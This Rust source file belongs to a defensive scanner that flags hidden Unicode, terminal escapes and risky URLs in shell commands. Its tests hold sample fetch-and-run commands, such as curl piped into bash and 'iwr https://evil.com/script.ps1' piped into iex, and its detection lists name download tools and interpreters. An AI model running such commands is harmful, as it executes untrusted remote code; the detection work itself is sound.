tirith_core/
extract.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
7/// Context for Tier 1 scanning.
8#[derive(Debug, Clone, Copy, PartialEq, Eq)]
9pub enum ScanContext {
10    /// Exec-time: command about to be executed (check subcommand).
11    Exec,
12    /// Paste-time: content being pasted (paste subcommand).
13    Paste,
14    /// File scan: content read from a file (scan subcommand).
15    /// Skips tier-1 fast-exit, runs byte scan + configfile rules only.
16    FileScan,
17}
18
19// Include generated Tier 1 patterns from build.rs declarative pattern table.
20#[allow(dead_code)]
21mod tier1_generated {
22    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
23}
24
25/// Expose the build-time extractor IDs for test-time cross-referencing.
26pub fn extractor_ids() -> &'static [&'static str] {
27    tier1_generated::EXTRACTOR_IDS
28}
29
30/// Tier 1 exec-time regex — generated from declarative pattern table in build.rs.
31static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
32    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
33});
34
35/// Tier 1 paste-time regex — exec patterns PLUS paste-only patterns (e.g. non-ASCII).
36static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
37    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
38});
39
40/// Standard URL extraction regex for Tier 3.
41static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
42    Regex::new(
43        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
44    )
45    .expect("url regex must compile")
46});
47
48/// Control character patterns for paste-time byte scanning.
49pub struct ByteScanResult {
50    pub has_ansi_escapes: bool,
51    pub has_control_chars: bool,
52    pub has_bidi_controls: bool,
53    pub has_zero_width: bool,
54    pub has_invalid_utf8: bool,
55    pub has_unicode_tags: bool,
56    pub has_variation_selectors: bool,
57    pub has_invisible_math_operators: bool,
58    pub has_invisible_whitespace: bool,
59    pub details: Vec<ByteFinding>,
60}
61
62pub struct ByteFinding {
63    pub offset: usize,
64    pub byte: u8,
65    /// Full Unicode codepoint for multi-byte characters (None for single-byte findings).
66    pub codepoint: Option<u32>,
67    pub description: String,
68}
69
70/// Tier 1: Fast scan for URL-like content. Returns true if full analysis needed.
71pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
72    match context {
73        ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
74        ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
75        // FileScan always proceeds to tier-3 (no fast-exit)
76        ScanContext::FileScan => true,
77    }
78}
79
80/// Scan raw bytes for control characters (paste-time, Tier 1 step 1).
81pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
82    let mut result = ByteScanResult {
83        has_ansi_escapes: false,
84        has_control_chars: false,
85        has_bidi_controls: false,
86        has_zero_width: false,
87        has_invalid_utf8: false,
88        has_unicode_tags: false,
89        has_variation_selectors: false,
90        has_invisible_math_operators: false,
91        has_invisible_whitespace: false,
92        details: Vec::new(),
93    };
94
95    // Check for invalid UTF-8
96    if std::str::from_utf8(input).is_err() {
97        result.has_invalid_utf8 = true;
98    }
99
100    let len = input.len();
101    let mut i = 0;
102    while i < len {
103        let b = input[i];
104
105        // Escape sequences: CSI (\e[), OSC (\e]), APC (\e_), DCS (\eP)
106        if b == 0x1b {
107            if i + 1 < len {
108                let next = input[i + 1];
109                if next == b'[' || next == b']' || next == b'_' || next == b'P' {
110                    result.has_ansi_escapes = true;
111                    result.details.push(ByteFinding {
112                        offset: i,
113                        byte: b,
114                        codepoint: None,
115                        description: match next {
116                            b'[' => "CSI escape sequence",
117                            b']' => "OSC escape sequence",
118                            b'_' => "APC escape sequence",
119                            b'P' => "DCS escape sequence",
120                            _ => "escape sequence",
121                        }
122                        .to_string(),
123                    });
124                    i += 2;
125                    continue;
126                }
127            } else {
128                // Trailing lone ESC
129                result.has_ansi_escapes = true;
130                result.details.push(ByteFinding {
131                    offset: i,
132                    byte: b,
133                    codepoint: None,
134                    description: "trailing escape byte".to_string(),
135                });
136            }
137        }
138
139        // Control characters (< 0x20, excluding common whitespace and ESC)
140        // For \r: only flag when followed by non-\n (display-overwriting attack).
141        // Trailing \r and \r\n (Windows line endings) are benign clipboard artifacts.
142        if b == b'\r' {
143            let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
144            if is_attack_cr {
145                result.has_control_chars = true;
146                result.details.push(ByteFinding {
147                    offset: i,
148                    byte: b,
149                    codepoint: None,
150                    description: format!("control character 0x{b:02x}"),
151                });
152            }
153        } else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
154            result.has_control_chars = true;
155            result.details.push(ByteFinding {
156                offset: i,
157                byte: b,
158                codepoint: None,
159                description: format!("control character 0x{b:02x}"),
160            });
161        }
162
163        // DEL character
164        if b == 0x7F {
165            result.has_control_chars = true;
166            result.details.push(ByteFinding {
167                offset: i,
168                byte: b,
169                codepoint: None,
170                description: "control character 0x7f (DEL)".to_string(),
171            });
172        }
173
174        // Check for UTF-8 multi-byte sequences that are bidi or zero-width
175        if b >= 0xc0 {
176            // Try to decode UTF-8 character
177            let remaining = &input[i..];
178            if let Some(ch) = std::str::from_utf8(remaining)
179                .ok()
180                .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
181                .and_then(|s| s.chars().next())
182            {
183                // Bidi controls
184                if is_bidi_control(ch) {
185                    result.has_bidi_controls = true;
186                    result.details.push(ByteFinding {
187                        offset: i,
188                        byte: b,
189                        codepoint: Some(ch as u32),
190                        description: format!("bidi control U+{:04X}", ch as u32),
191                    });
192                }
193                // Zero-width characters (ZWSP, ZWNJ, ZWJ, BOM, CGJ, Soft Hyphen, Word Joiner)
194                // BOM (U+FEFF) at offset 0 is a file-encoding artifact, not an attack
195                if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
196                    result.has_zero_width = true;
197                    result.details.push(ByteFinding {
198                        offset: i,
199                        byte: b,
200                        codepoint: Some(ch as u32),
201                        description: format!("zero-width character U+{:04X}", ch as u32),
202                    });
203                }
204                // Unicode Tags (hidden ASCII encoding) U+E0000–U+E007F
205                if is_unicode_tag(ch) {
206                    result.has_unicode_tags = true;
207                    result.details.push(ByteFinding {
208                        offset: i,
209                        byte: b,
210                        codepoint: Some(ch as u32),
211                        description: format!("unicode tag U+{:04X}", ch as u32),
212                    });
213                }
214                // Variation selectors: U+FE00–U+FE0F and U+E0100–U+E01EF
215                if is_variation_selector(ch) {
216                    result.has_variation_selectors = true;
217                    result.details.push(ByteFinding {
218                        offset: i,
219                        byte: b,
220                        codepoint: Some(ch as u32),
221                        description: format!("variation selector U+{:04X}", ch as u32),
222                    });
223                }
224                // Invisible math operators U+2061–U+2064
225                if is_invisible_math_operator(ch) {
226                    result.has_invisible_math_operators = true;
227                    result.details.push(ByteFinding {
228                        offset: i,
229                        byte: b,
230                        codepoint: Some(ch as u32),
231                        description: format!("invisible math operator U+{:04X}", ch as u32),
232                    });
233                }
234                // Invisible whitespace: Hair Space, Thin Space, Narrow No-Break Space
235                if is_invisible_whitespace(ch) {
236                    result.has_invisible_whitespace = true;
237                    result.details.push(ByteFinding {
238                        offset: i,
239                        byte: b,
240                        codepoint: Some(ch as u32),
241                        description: format!("invisible whitespace U+{:04X}", ch as u32),
242                    });
243                }
244                i += ch.len_utf8();
245                continue;
246            }
247        }
248
249        i += 1;
250    }
251
252    result
253}
254
255/// Check if a character is a bidi control.
256fn is_bidi_control(ch: char) -> bool {
257    matches!(
258        ch,
259        '\u{200E}' // LRM
260        | '\u{200F}' // RLM
261        | '\u{202A}' // LRE
262        | '\u{202B}' // RLE
263        | '\u{202C}' // PDF
264        | '\u{202D}' // LRO
265        | '\u{202E}' // RLO
266        | '\u{2066}' // LRI
267        | '\u{2067}' // RLI
268        | '\u{2068}' // FSI
269        | '\u{2069}' // PDI
270    )
271}
272
273/// Check if a character is zero-width.
274fn is_zero_width(ch: char) -> bool {
275    matches!(
276        ch,
277        '\u{200B}' // ZWSP
278        | '\u{200C}' // ZWNJ
279        | '\u{200D}' // ZWJ
280        | '\u{FEFF}' // BOM / ZWNBSP
281        | '\u{034F}' // Combining Grapheme Joiner
282        | '\u{00AD}' // Soft Hyphen
283        | '\u{2060}' // Word Joiner
284    )
285}
286
287/// Check if a character is a Unicode Tag (hidden ASCII encoding).
288fn is_unicode_tag(ch: char) -> bool {
289    ('\u{E0000}'..='\u{E007F}').contains(&ch)
290}
291
292/// Check if a character is a variation selector.
293fn is_variation_selector(ch: char) -> bool {
294    // VS1-16
295    ('\u{FE00}'..='\u{FE0F}').contains(&ch)
296    // VS17-256 (Supplementary)
297    || ('\u{E0100}'..='\u{E01EF}').contains(&ch)
298}
299
300/// Check if a character is an invisible math operator.
301fn is_invisible_math_operator(ch: char) -> bool {
302    // Function Application, Invisible Times, Invisible Separator, Invisible Plus
303    ('\u{2061}'..='\u{2064}').contains(&ch)
304}
305
306/// Check if a character is an invisible whitespace variant.
307fn is_invisible_whitespace(ch: char) -> bool {
308    matches!(
309        ch,
310        '\u{200A}' // Hair Space
311        | '\u{2009}' // Thin Space
312        | '\u{202F}' // Narrow No-Break Space
313    )
314}
315
316/// Tier 3: Extract URL-like patterns from a command string.
317/// Uses shell-aware tokenization, then extracts URLs from each segment.
318pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
319    let segments = tokenize::tokenize(input, shell);
320    let mut results = Vec::new();
321
322    for (seg_idx, segment) in segments.iter().enumerate() {
323        // Extract standard URLs from command + args (not raw text, to skip env-prefix values).
324        // Since URL_REGEX stops at whitespace, scanning individual words is equivalent to
325        // scanning the non-env-prefix portion of the raw text.
326        let mut url_sources: Vec<&str> = Vec::new();
327        if let Some(ref cmd) = segment.command {
328            url_sources.push(cmd.as_str());
329        }
330        for arg in &segment.args {
331            url_sources.push(arg.as_str());
332        }
333        for source in &url_sources {
334            for mat in URL_REGEX.find_iter(source) {
335                let raw = mat.as_str().to_string();
336                let url = parse::parse_url(&raw);
337                results.push(ExtractedUrl {
338                    raw,
339                    parsed: url,
340                    segment_index: seg_idx,
341                    in_sink_context: is_sink_context(segment, &segments),
342                });
343            }
344        }
345
346        // Check for schemeless URLs in sink contexts
347        // Skip for docker/podman/nerdctl commands since their args are handled as DockerRef
348        let is_docker_cmd = segment.command.as_ref().is_some_and(|cmd| {
349            let cmd_lower = cmd.to_lowercase();
350            matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl")
351        });
352        if is_sink_context(segment, &segments) && !is_docker_cmd {
353            for (arg_idx, arg) in segment.args.iter().enumerate() {
354                // Skip args that are output-file flag values
355                if let Some(cmd) = &segment.command {
356                    if is_output_flag_value(cmd, &segment.args, arg_idx) {
357                        continue;
358                    }
359                }
360                let clean = strip_quotes(arg);
361                if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
362                    results.push(ExtractedUrl {
363                        raw: clean.clone(),
364                        parsed: UrlLike::SchemelessHostPath {
365                            host: extract_host_from_schemeless(&clean),
366                            path: extract_path_from_schemeless(&clean),
367                        },
368                        segment_index: seg_idx,
369                        in_sink_context: true,
370                    });
371                }
372            }
373        }
374
375        // Check for Docker refs in docker commands
376        if let Some(cmd) = &segment.command {
377            let cmd_lower = cmd.to_lowercase();
378            if matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl") {
379                if let Some(docker_subcmd) = segment.args.first() {
380                    let subcmd_lower = docker_subcmd.to_lowercase();
381                    if subcmd_lower == "build" {
382                        // For build, only -t/--tag values are image refs
383                        let mut i = 1;
384                        while i < segment.args.len() {
385                            let arg = strip_quotes(&segment.args[i]);
386                            if (arg == "-t" || arg == "--tag") && i + 1 < segment.args.len() {
387                                let tag_val = strip_quotes(&segment.args[i + 1]);
388                                if !tag_val.is_empty() {
389                                    let docker_url = parse::parse_docker_ref(&tag_val);
390                                    results.push(ExtractedUrl {
391                                        raw: tag_val,
392                                        parsed: docker_url,
393                                        segment_index: seg_idx,
394                                        in_sink_context: true,
395                                    });
396                                }
397                                i += 2;
398                            } else if arg.starts_with("-t") && arg.len() > 2 {
399                                let tag_val = strip_quotes(&arg[2..]);
400                                let docker_url = parse::parse_docker_ref(&tag_val);
401                                results.push(ExtractedUrl {
402                                    raw: tag_val,
403                                    parsed: docker_url,
404                                    segment_index: seg_idx,
405                                    in_sink_context: true,
406                                });
407                                i += 1;
408                            } else if let Some(val) = arg.strip_prefix("--tag=") {
409                                let tag_val = strip_quotes(val);
410                                let docker_url = parse::parse_docker_ref(&tag_val);
411                                results.push(ExtractedUrl {
412                                    raw: tag_val,
413                                    parsed: docker_url,
414                                    segment_index: seg_idx,
415                                    in_sink_context: true,
416                                });
417                                i += 1;
418                            } else {
419                                i += 1;
420                            }
421                        }
422                    } else if subcmd_lower == "image" {
423                        // docker image pull/push/inspect — actual subcmd is args[1]
424                        if let Some(image_subcmd) = segment.args.get(1) {
425                            let image_subcmd_lower = image_subcmd.to_lowercase();
426                            if matches!(
427                                image_subcmd_lower.as_str(),
428                                "pull" | "push" | "inspect" | "rm" | "tag"
429                            ) {
430                                extract_first_docker_image(
431                                    &segment.args[2..],
432                                    seg_idx,
433                                    &mut results,
434                                );
435                            }
436                        }
437                    } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
438                        // First non-flag arg is image, then stop
439                        extract_first_docker_image(&segment.args[1..], seg_idx, &mut results);
440                    }
441                }
442            }
443        }
444    }
445
446    results
447}
448
449/// An extracted URL with context.
450#[derive(Debug, Clone)]
451pub struct ExtractedUrl {
452    pub raw: String,
453    pub parsed: UrlLike,
454    pub segment_index: usize,
455    pub in_sink_context: bool,
456}
457
458/// Common value-taking flags across docker subcommands.
459const DOCKER_VALUE_FLAGS: &[&str] = &[
460    "--platform",
461    "--format",
462    "--filter",
463    "-f",
464    "--label",
465    "-l",
466    "--name",
467    "--hostname",
468    "--user",
469    "-u",
470    "--workdir",
471    "-w",
472    "--network",
473    "--net",
474    "--env",
475    "-e",
476    "--env-file",
477    "--publish",
478    "-p",
479    "--expose",
480    "--volume",
481    "-v",
482    "--mount",
483    "--add-host",
484    "--device",
485    "--entrypoint",
486    "--log-driver",
487    "--log-opt",
488    "--restart",
489    "--runtime",
490    "--cpus",
491    "--cpu-shares",
492    "--cpu-quota",
493    "--memory",
494    "--memory-reservation",
495    "--memory-swap",
496    "--shm-size",
497    "--ulimit",
498    "--security-opt",
499    "--sysctl",
500    "--tmpfs",
501    "--gpus",
502    "--ipc",
503    "--pid",
504    "--userns",
505    "--cgroupns",
506];
507
508/// Short flags that may embed their value inline (e.g., -p8080:80).
509const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
510
511/// Extract the first non-flag argument as a Docker image reference.
512fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
513    let mut skip_next = false;
514    for arg in args {
515        if skip_next {
516            skip_next = false;
517            continue;
518        }
519        let clean = strip_quotes(arg);
520        if clean == "--" {
521            break;
522        }
523        if clean.starts_with("--") && clean.contains('=') {
524            continue; // --flag=value, skip
525        }
526        if clean.starts_with('-') {
527            if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
528                skip_next = true;
529            }
530            if DOCKER_VALUE_PREFIXES
531                .iter()
532                .any(|p| clean.starts_with(p) && clean.len() > p.len())
533            {
534                continue;
535            }
536            continue;
537        }
538        if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
539            let docker_url = parse::parse_docker_ref(&clean);
540            results.push(ExtractedUrl {
541                raw: clean,
542                parsed: docker_url,
543                segment_index: seg_idx,
544                in_sink_context: true,
545            });
546        }
547        break; // Only first non-flag arg is the image
548    }
549}
550
551/// Check if a segment is in a "sink" context (executing/downloading).
552fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
553    if let Some(cmd) = &segment.command {
554        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
555        let cmd_lower = cmd_base.to_lowercase();
556        // git is only a sink for download subcommands (clone, fetch, pull, etc.)
557        if cmd_lower == "git" {
558            return is_git_sink(segment);
559        }
560        if is_source_command(&cmd_lower) {
561            return true;
562        }
563    }
564
565    // Check if this segment pipes into a sink
566    if let Some(sep) = &segment.preceding_separator {
567        if sep == "|" || sep == "|&" {
568            // This segment receives piped input — check if it's an interpreter
569            if let Some(cmd) = &segment.command {
570                let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
571                if is_interpreter(cmd_base) {
572                    return true;
573                }
574            }
575        }
576    }
577
578    false
579}
580
581fn is_source_command(cmd: &str) -> bool {
582    matches!(
583        cmd,
584        "curl"
585            | "wget"
586            | "http"
587            | "https"
588            | "xh"
589            | "fetch"
590            | "scp"
591            | "rsync"
592            | "docker"
593            | "podman"
594            | "nerdctl"
595            | "pip"
596            | "pip3"
597            | "npm"
598            | "npx"
599            | "yarn"
600            | "pnpm"
601            | "go"
602            | "cargo"
603            | "iwr"
604            | "irm"
605            | "invoke-webrequest"
606            | "invoke-restmethod"
607    )
608}
609
610/// Check if a git command is in a sink context (only subcommands that download).
611/// `git add`, `git commit`, `git status`, etc. are NOT sinks.
612fn is_git_sink(segment: &Segment) -> bool {
613    if segment.args.is_empty() {
614        return false;
615    }
616    // First non-flag arg is the subcommand
617    for arg in &segment.args {
618        let clean = strip_quotes(arg);
619        if clean.starts_with('-') {
620            continue;
621        }
622        return matches!(
623            clean.as_str(),
624            "clone" | "fetch" | "pull" | "submodule" | "remote"
625        );
626    }
627    false
628}
629
630fn is_interpreter(cmd: &str) -> bool {
631    matches!(
632        cmd,
633        "sh" | "bash"
634            | "zsh"
635            | "dash"
636            | "ksh"
637            | "python"
638            | "python3"
639            | "node"
640            | "perl"
641            | "ruby"
642            | "php"
643            | "iex"
644            | "invoke-expression"
645    )
646}
647
648/// Check if an arg at the given index is the value of an output-file or credential flag
649/// for the given command. Returns true if this arg should be skipped during schemeless
650/// URL detection (output filenames and auth credentials can look like domains).
651fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
652    let cmd_lower = cmd.to_lowercase();
653    let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);
654
655    match cmd_base {
656        "curl" => {
657            if arg_index > 0 {
658                let prev = strip_quotes(&args[arg_index - 1]);
659                if prev == "-o"
660                    || prev == "--output"
661                    || prev == "-u"
662                    || prev == "--user"
663                    || prev == "-U"
664                    || prev == "--proxy-user"
665                {
666                    return true;
667                }
668            }
669            let current = strip_quotes(&args[arg_index]);
670            if current.starts_with("-o") && current.len() > 2 && !current.starts_with("--") {
671                return true;
672            }
673            if current.starts_with("--output=")
674                || current.starts_with("--user=")
675                || current.starts_with("--proxy-user=")
676            {
677                return true;
678            }
679            false
680        }
681        "wget" => {
682            if arg_index > 0 {
683                let prev = strip_quotes(&args[arg_index - 1]);
684                if prev == "-O"
685                    || prev == "--output-document"
686                    || prev == "--user"
687                    || prev == "--password"
688                    || prev == "--http-user"
689                    || prev == "--http-password"
690                    || prev == "--ftp-user"
691                    || prev == "--ftp-password"
692                    || prev == "--proxy-user"
693                    || prev == "--proxy-password"
694                {
695                    return true;
696                }
697            }
698            let current = strip_quotes(&args[arg_index]);
699            if current.starts_with("-O") && current.len() > 2 && !current.starts_with("--") {
700                return true;
701            }
702            if current.starts_with("--output-document=")
703                || current.starts_with("--user=")
704                || current.starts_with("--password=")
705                || current.starts_with("--http-user=")
706                || current.starts_with("--http-password=")
707                || current.starts_with("--ftp-user=")
708                || current.starts_with("--ftp-password=")
709                || current.starts_with("--proxy-user=")
710                || current.starts_with("--proxy-password=")
711            {
712                return true;
713            }
714            false
715        }
716        "http" | "https" | "xh" => {
717            if arg_index > 0 {
718                let prev = strip_quotes(&args[arg_index - 1]);
719                if prev == "-a" || prev == "--auth" {
720                    return true;
721                }
722            }
723            let current = strip_quotes(&args[arg_index]);
724            if current.starts_with("--auth=") {
725                return true;
726            }
727            false
728        }
729        _ => false,
730    }
731}
732
733fn strip_quotes(s: &str) -> String {
734    let s = s.trim();
735    if s.len() >= 2
736        && ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
737    {
738        s[1..s.len() - 1].to_string()
739    } else {
740        s.to_string()
741    }
742}
743
744fn looks_like_schemeless_host(s: &str) -> bool {
745    // Must contain a dot, not start with -, not be a flag
746    if s.starts_with('-') || !s.contains('.') {
747        return false;
748    }
749    // Dotfiles and hidden files (e.g., .gitignore, .env.example) are not URLs
750    if s.starts_with('.') {
751        return false;
752    }
753    // Reject bare user@host (SSH/SCP/email) but keep user:pass@host (credentialed URL).
754    // bare user@host has no ':' before '@' and no '/' after the host.
755    if let Some(at_pos) = s.find('@') {
756        let before_at = &s[..at_pos];
757        let after_at = &s[at_pos + 1..];
758        if !before_at.contains(':') && !after_at.contains('/') {
759            return false;
760        }
761    }
762    // First component before / or end should look like a domain
763    let host_part = s.split('/').next().unwrap_or(s);
764    if !host_part.contains('.') || host_part.contains(' ') {
765        return false;
766    }
767    // Exclude args where the host part looks like a file (e.g., "install.sh")
768    // BUT only when there is no meaningful path component — if there IS a non-empty
769    // path (e.g., evil.zip/payload), the host part is likely a real domain even if its
770    // TLD overlaps a file extension. A trailing slash alone (file.sh/) does NOT count
771    // as a meaningful path — it's still a filename, not a domain.
772    let host_lower = host_part.to_lowercase();
773    let has_meaningful_path = s.find('/').is_some_and(|idx| {
774        let after_slash = &s[idx + 1..];
775        !after_slash.is_empty() && after_slash != "/"
776    });
777    if !has_meaningful_path {
778        let file_exts = [
779            ".sh",
780            ".py",
781            ".rb",
782            ".js",
783            ".ts",
784            ".go",
785            ".rs",
786            ".c",
787            ".h",
788            ".txt",
789            ".md",
790            ".json",
791            ".yaml",
792            ".yml",
793            ".xml",
794            ".html",
795            ".css",
796            ".tar.gz",
797            ".tar.bz2",
798            ".tar.xz",
799            ".tgz",
800            ".zip",
801            ".gz",
802            ".bz2",
803            ".rpm",
804            ".deb",
805            ".pkg",
806            ".dmg",
807            ".exe",
808            ".msi",
809            ".dll",
810            ".so",
811            ".log",
812            ".conf",
813            ".cfg",
814            ".ini",
815            ".toml",
816            ".png",
817            ".jpg",
818            ".jpeg",
819            ".gif",
820            ".bmp",
821            ".ico",
822            ".tiff",
823            ".tif",
824            ".pdf",
825            ".csv",
826            ".mp3",
827            ".mp4",
828            ".wav",
829            ".avi",
830            ".mkv",
831            ".flac",
832            ".ogg",
833            ".webm",
834            ".ttf",
835            ".otf",
836            ".woff",
837            ".woff2",
838            ".docx",
839            ".xlsx",
840            ".pptx",
841            ".sqlite",
842            ".lock",
843            ".example",
844            ".local",
845            ".bak",
846            ".tmp",
847            ".swp",
848            ".orig",
849            ".patch",
850            ".diff",
851            ".map",
852            ".env",
853            ".sample",
854            ".dist",
855            ".editorconfig",
856        ];
857        if file_exts.iter().any(|ext| host_lower.ends_with(ext)) {
858            return false;
859        }
860    }
861    // Must have at least 2 labels (e.g., "example.com" not just "file.txt")
862    let labels: Vec<&str> = host_part.split('.').collect();
863    if labels.len() < 2 {
864        return false;
865    }
866    // Last label (TLD) should be 2-63 alphabetic chars (DNS label max)
867    let tld = labels.last().unwrap();
868    tld.len() >= 2 && tld.len() <= 63 && tld.chars().all(|c| c.is_ascii_alphabetic())
869}
870
871fn extract_host_from_schemeless(s: &str) -> String {
872    s.split('/').next().unwrap_or(s).to_string()
873}
874
875fn extract_path_from_schemeless(s: &str) -> String {
876    if let Some(idx) = s.find('/') {
877        s[idx..].to_string()
878    } else {
879        String::new()
880    }
881}
882
883#[cfg(test)]
884mod tests {
885    use super::*;
886
887    #[test]
888    fn test_tier1_exec_matches_url() {
889        assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
890    }
891
892    #[test]
893    fn test_tier1_exec_no_match_simple() {
894        assert!(!tier1_scan("ls -la", ScanContext::Exec));
895    }
896
897    #[test]
898    fn test_tier1_exec_no_match_echo() {
899        assert!(!tier1_scan("echo hello world", ScanContext::Exec));
900    }
901
902    #[test]
903    fn test_tier1_exec_matches_pipe_bash() {
904        assert!(tier1_scan("something | bash", ScanContext::Exec));
905    }
906
907    #[test]
908    fn test_tier1_exec_matches_pipe_sudo_bash() {
909        assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
910    }
911
912    #[test]
913    fn test_tier1_exec_matches_pipe_env_bash() {
914        assert!(tier1_scan("something | env bash", ScanContext::Exec));
915    }
916
917    #[test]
918    fn test_tier1_exec_matches_pipe_bin_bash() {
919        assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
920    }
921
922    #[test]
923    fn test_tier1_exec_matches_git_scp() {
924        assert!(tier1_scan(
925            "git clone git@github.com:user/repo",
926            ScanContext::Exec
927        ));
928    }
929
930    #[test]
931    fn test_tier1_exec_matches_punycode() {
932        assert!(tier1_scan(
933            "curl https://xn--example-cua.com",
934            ScanContext::Exec
935        ));
936    }
937
938    #[test]
939    fn test_tier1_exec_matches_docker() {
940        assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
941    }
942
943    #[test]
944    fn test_tier1_exec_matches_iwr() {
945        assert!(tier1_scan(
946            "iwr https://evil.com/script.ps1",
947            ScanContext::Exec
948        ));
949    }
950
951    #[test]
952    fn test_tier1_exec_matches_curl() {
953        assert!(tier1_scan(
954            "curl https://example.com/install.sh",
955            ScanContext::Exec
956        ));
957    }
958
959    #[test]
960    fn test_tier1_exec_matches_lookalike_tld() {
961        assert!(tier1_scan("open file.zip", ScanContext::Exec));
962    }
963
964    #[test]
965    fn test_tier1_exec_matches_shortener() {
966        assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
967    }
968
969    #[test]
970    fn test_tier1_paste_matches_non_ascii() {
971        assert!(tier1_scan("café", ScanContext::Paste));
972    }
973
974    #[test]
975    fn test_tier1_paste_exec_patterns_also_match() {
976        assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
977    }
978
979    #[test]
980    fn test_tier1_exec_no_non_ascii() {
981        // Non-ASCII should NOT trigger exec-time scan
982        assert!(!tier1_scan("echo café", ScanContext::Exec));
983    }
984
985    #[test]
986    fn test_byte_scan_ansi() {
987        let input = b"hello \x1b[31mred\x1b[0m world";
988        let result = scan_bytes(input);
989        assert!(result.has_ansi_escapes);
990    }
991
992    #[test]
993    fn test_byte_scan_control_chars() {
994        let input = b"hello\rworld";
995        let result = scan_bytes(input);
996        assert!(result.has_control_chars);
997    }
998
999    #[test]
1000    fn test_byte_scan_bidi() {
1001        let input = "hello\u{202E}dlrow".as_bytes();
1002        let result = scan_bytes(input);
1003        assert!(result.has_bidi_controls);
1004    }
1005
1006    #[test]
1007    fn test_byte_scan_zero_width() {
1008        let input = "hel\u{200B}lo".as_bytes();
1009        let result = scan_bytes(input);
1010        assert!(result.has_zero_width);
1011    }
1012
1013    #[test]
1014    fn test_byte_scan_clean() {
1015        let input = b"hello world\n";
1016        let result = scan_bytes(input);
1017        assert!(!result.has_ansi_escapes);
1018        assert!(!result.has_control_chars);
1019        assert!(!result.has_bidi_controls);
1020        assert!(!result.has_zero_width);
1021    }
1022
1023    #[test]
1024    fn test_extract_urls_basic() {
1025        let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
1026        assert_eq!(urls.len(), 1);
1027        assert_eq!(urls[0].raw, "https://example.com/install.sh");
1028    }
1029
1030    #[test]
1031    fn test_extract_urls_pipe() {
1032        let urls = extract_urls(
1033            "curl https://example.com/install.sh | bash",
1034            ShellType::Posix,
1035        );
1036        assert!(!urls.is_empty());
1037        assert!(urls[0].in_sink_context);
1038    }
1039
1040    #[test]
1041    fn test_extract_urls_scp() {
1042        let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
1043        assert!(!urls.is_empty());
1044        assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
1045    }
1046
1047    #[test]
1048    fn test_extract_docker_ref() {
1049        let urls = extract_urls("docker pull nginx", ShellType::Posix);
1050        let docker_urls: Vec<_> = urls
1051            .iter()
1052            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1053            .collect();
1054        assert_eq!(docker_urls.len(), 1);
1055    }
1056
1057    #[test]
1058    fn test_extract_powershell_iwr() {
1059        let urls = extract_urls(
1060            "iwr https://example.com/script.ps1 | iex",
1061            ShellType::PowerShell,
1062        );
1063        assert!(!urls.is_empty());
1064    }
1065
1066    #[test]
1067    fn test_strip_quotes_single_char() {
1068        assert_eq!(strip_quotes("\""), "\"");
1069        assert_eq!(strip_quotes("'"), "'");
1070    }
1071
1072    #[test]
1073    fn test_strip_quotes_empty() {
1074        assert_eq!(strip_quotes(""), "");
1075    }
1076
1077    #[test]
1078    fn test_scan_bytes_bel_vt_del() {
1079        // BEL (0x07)
1080        let input = b"hello\x07world";
1081        let result = scan_bytes(input);
1082        assert!(result.has_control_chars);
1083
1084        // VT (0x0B)
1085        let input = b"hello\x0Bworld";
1086        let result = scan_bytes(input);
1087        assert!(result.has_control_chars);
1088
1089        // FF (0x0C)
1090        let input = b"hello\x0Cworld";
1091        let result = scan_bytes(input);
1092        assert!(result.has_control_chars);
1093
1094        // DEL (0x7F)
1095        let input = b"hello\x7Fworld";
1096        let result = scan_bytes(input);
1097        assert!(result.has_control_chars);
1098    }
1099
1100    #[test]
1101    fn test_scan_bytes_osc_apc_dcs() {
1102        // OSC: \e]
1103        let input = b"hello\x1b]0;title\x07world";
1104        let result = scan_bytes(input);
1105        assert!(result.has_ansi_escapes);
1106
1107        // APC: \e_
1108        let input = b"hello\x1b_dataworld";
